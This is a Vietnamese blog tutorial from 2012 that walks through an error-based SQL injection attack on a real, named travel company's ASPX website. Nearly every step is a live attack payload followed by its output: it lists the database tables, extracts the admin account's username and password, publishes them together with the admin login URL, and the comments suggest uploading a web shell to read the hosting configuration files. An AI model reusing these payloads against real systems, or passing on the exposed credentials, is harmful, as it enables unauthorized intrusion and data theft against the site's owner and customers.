Thứ Hai, 9 tháng 7, 2012

[TUT] khai thác SQL dạng aspx

vào việc luôn

victim: http://www.saobientravel.com/

lấy em này làm dung dịch thí nghiệm:
http://www.saobientravel.com/Chi-tie...spx?idtour=183

việc tiếp theo là cho quì tím để nhận biết nó là axit hay bazơ.

http://www.saobientravel.com/Chi-tie...spx?idtour=183'

áh hự. nó ra lỗi này.

Quote:
Unclosed quotation mark after the character string ''.
và chúng ta đã nhận biết nó là Muối ^^.

Giờ ta tìm version của muối này :

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,@@version)-- -

ta đc
Quote:
Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (Intel X86)
Jul 9 2008 14:43:34
Copyright (c) 1988-2008 Microsoft Corporation
Enterprise Edition on Windows NT 5.2 <X86> (Build 3790: Service Pack 2)

đó là version của nó
sever windows NT 5.2
giờ sẽ get tên database :
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,db_name())-- -

Quote:
nó đây : saobientravel_vn

user của nó đây saobientravel_vn
giờ mình sẽ get table name của nó nha

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -

Quote:
nó ra chỉ 1 table là 'KHACHHANG_53'
ta phải làm cho nó hiển thị các table khác

http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in () ))-- -

nó ra 1 table khác 'DONHANG_55'
cứ như thế sẽ ra các table cần ììm
mình có check trước ròi, nó nhìu table name lắm đa số là giả
Quote:
'KHACHHANG_53','DONHANG_55','QUOCGIA_7','KHACHHANG ','DOITAC_43','quocgia','HOIDAP_44','DIEMDEN_KHACH SAN_41','QUANGCAO_22''HINHTOUR_36','QUANGCAO_22',' HINHTOUR_36','DIEMDEN_37','quangcao','HINHTOUR','D IEMDEN','PHUONGTIEN_39','HINHTINTUC_17','DICHVU_19 ','phuongtien','HINHSANPHAM_27','dichvu','PHONGKHA CHSAN_32','HINHQUANGCAO_23','CHINHANH_54','PHIEUXU AT_CHITIET_52','HINHKS','bookingtrain','PHIEUXUAT_ 51','HINHKHACHSAN_31','BAOGIA_42','PHIEUNHAP_CHITI ET_50','HINHGIOITHIEU_55','BANER_2','PHIEUNHAP_49' ,'HINHDICHVU_20','baner','NHANXET_5','HINHANH_12', 'VIDEO_14','nhanxet','hdtour','video','NGANHNGHE_5 4','hdhotel','TUYENDUNG_48','LOAIVIDEO_13','GUIMAI L_56','TOUR_PHUONGTIEN_40','LOAITUYENDUNG_47','GIO ITHIEU_6','TOUR_KHACHSAN_38','LOAITOUR_34','gioith ieu','TOUR_DIEMDEN','LOAITINTUC_15','giavisa','TOU R_35','LOAITAILIEU_45','giavetau','TOUR','LOAISANP HAM_25','giatour','TOP_MENU_53','LOAIQUANGCAO_21', 'giaphong','TINTUC_16','LOAIKHACHSAN_29','vungmien ','tintuc','LOAIHINHANH_11','tinhthanh','TINHTHANH _9','LOAIDICHVU_18','VUNGMIEN_8','LOAIBAOGIA_42_1' ,'THONGTINGUIMAIL_10','LOAIBANER_2_1','thongtingui mail','LIENKET_3','THELOAITOUR_33','lienket','THEL OAISANPHAM_24','KHlienhe','THELOAIKHACSAN_28','KHA CHSAN_DIEMDEN','TAILIEU_46','KHACHSAN_30','TAIKHOA N_1','KHACHSAN','TaiKhoan'
những table name nào mà có _số đều là giả
đây là table ta cần tìm 'TaiKhoan' k có số phía sau
ừm mà chỉ có trang này thỳ có _số mới là giả vì mỗi trang mỗi khác mà
ok giờ mình sẽ get column
http://www.saobientravel.com/Chi-tiet-tour.aspx
?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') ))-- -

Quote:
có 1 column 'IDtaikhoan' mình sẽ get column khác
http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') and column_name not in ('IDtaikhoan') ))-- -

Quote:
nó ra 'TENDANGNHAP' . ta tiếp tục thêm vào để get như get table


http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('TaiKhoan') and column_name not in ('IDtaikhoan','TENDANGNHAP') ))-- -


Quote:
kết quả là 'MATKHAU'
ok đã có 2 column TENDANGNHAP và MATKHAU
bây giờ mình sẽ get user và pass


http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 TENDANGNHAP from TaiKhoan ))-- -



http://www.saobientravel.com/Chi-tie...spx?idtour=183 and 1=convert(int,(select top 1 MATKHAU from TaiKhoan ))-- -


kết quả :

user: admin
pass: admin

tặng anh em link admin :
http://www.saobientravel.com/dangnhap.aspx
Chuyên Mục:
Người đăng: vào lúc

2 nhận xét:

  1. icondep.comlúc 01:33 10 tháng 7, 2012

    Chào bạn

    - Minh đã vào hosting http://www.saobientravel.com
    - Nhưng mình ko biết user và pass để đăng nhập vào hosting này nằm ở trong file nào, ở đâu
    - Hosting: Parallels Plesk Panel 9.3
    - Mình chưa rành về aspx lắm
    - Mong bạn hướng dẫn
    -Mail của mình : mythonestar@gmail.com
    thank you so much!

    Trả lờiXóa
  2. Kẻ Chọc Giậnlúc 20:58 10 tháng 7, 2012

    - Nhưng mình ko biết user và pass để đăng nhập vào hosting này nằm ở trong file nào, ở đâu
    >> mình xin giải thích cho bạn điều này. đó là khi khai thác 1 site lỗi, mục tiêu của chúng ta là khai thác vào database của site để tìm kiếm data cần thiết cho mục đích ( thường thì khai thác data chứa nick admin để login vào site đó, có thể up shell để local, hoặc mục đích khác ).
    -còn bạn muốn login vào hosting của họ thì khó có thể ( vì user và pass login hosting không ở trong data nhé). nhưng nếu may mắn, mình có thể up shell để đọc file config và tìm kiếm user và pass login hosting của site này !

    Trả lờiXóa

Đăng ký: Đăng Nhận xét (Atom)